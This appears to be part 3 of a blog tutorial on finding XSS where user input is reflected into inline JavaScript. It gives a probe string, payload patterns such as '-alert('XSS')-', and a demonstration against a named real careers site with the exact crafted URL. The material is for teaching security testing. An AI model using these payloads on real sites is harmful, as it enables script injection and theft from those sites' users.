Update: You can get the tutorial in PDF format here: 01-04-15_XSS_Tutorial_Korznikov_Alexander.pdf
This is part 3 of XSS in Real World tutorial.
Part 2 of XSS in Real World tutorial
Part 1 of XSS in Real World tutorial
The interesting thing, that this type of injection can be found on popular websites.
Even if there a sanitation of tags, and equal character – XSS is possible.
If the logic of web-site (no matter if it’s server-side or client-side), reflects user’s input in web-page’s javascript, we can use it for nasty purposes :)
Simple example:
We have URL: “http://www.example.com/?id=1&style=blue”
1. Parameter “id” is handled by Server-Side logic, checking for INTEGERIf we pass to the parameter “style” string: ‘blue //single quote
2. Parameter “style” handled by client-side javascript and reflected in this context:
var site.style = ‘blue’
The context will be: var site.style = ‘’blue’
This will throw an javascript exception: SyntaxError: unterminated string literal
Model:
\string\trash\string\
‘’ blue ‘ //unclosed string
In case if ID parameter is handled by client-side, and reflected in context:
var site.id = 1
Injected payload “id=1’trash” will look like:
var site.id = 1’trash
That will also throw an SyntaxError exception.
In case if our payload will look like “style=blue\”
var site.style = ‘blue\’
Again, will be SyntaxError exception, because javascript interprets \” as escaped quote.
So we can develop a noninvasive XSS locator:
‘” >trash\
single quote / double quote / space / greater sign / string / backslash
Some examples that this locator will break: //in case of no filtration
HTML Code break:
RED: Rendered as tags / BLUE: throwed out at the screen
<a href=”http://example.com/?id=1&style=’” >trash\” style=”blablabla”>
Javascript SyntaxErrors:
RED: Syntax errors
var a = “blue’” >trash\’
a=unescape(‘blue’” >trash\’)
var a = ‘blue’" >trash\’
Sometimes web-site logic will escape ’ or ” characters, so try to add to our locator \’\” >trash\ as result you may see:
var a = ‘blue\\’\\” >trash\
\’ as input will be \\’ as output, so our backslash is escaped, and quotation mark rendered.
One more thing to remember, that we can perform all mathematical operations for all objects in javascript.
For example, we can: ‘ale’+’rt’, or ‘a’ - ‘b’ or ‘a’ * ’b’. Google for more info :)
Examples of nasty javascript injections with various payloads:
var a = ‘blue’
var a = ‘blue’ - alert(‘xss’) - ‘’ //alert() will be executed
var b = [‘red’,’blue’,alert(‘xss’),’’]
var c = func(‘blue’+alert(/xss/))//) //after “//” the rest of line will be commented
Inline Javascript Real Demo.
Our second target will be www.nbcunicareers.com, XSS report date: 28/06/2014
For making our life easier we will need FireBug and Hack-Bar Firefox addons.
Entering our XSS locator (‘”>trash\) to the website’s “Find Jobs” input field:
Got us to this URL:
http://www.nbcunicareers.com/search-results?search_type=criteria&country=6&state=all&city=all&keywords='">trash\
and as response we will get:
As you can see in FireBug’s output, thrown an exception - SyntaxError: missing } after property list.
By clicking on the green URL right after the “SyntaxError”, we will get generated JavaScript source code:
As you can notice, on lines 570 and 577 the code was broken:
After server-side logic, out XSS locator looks like: ‘">trash\
So the “ and > tags are converted to HTML entities " > accordingly.
But the single quote is not converted, and only that broke the JavaScript code.
Let’s test for other useful characters () and enter this payload: ‘-a()-
Looks pretty good, characters aren’t converted and passed to generated JavaScript.
How JavaScript understands this payload? ‘ closes string, - subtracts results of a() function
So, our final payload should look like: ‘-alert(‘XSS’)-‘ and should not brake generated JavaScript execution.
pwned again :)
That’s all folks!
Like & Share :)
Alexander Korznikov.
No comments:
Post a Comment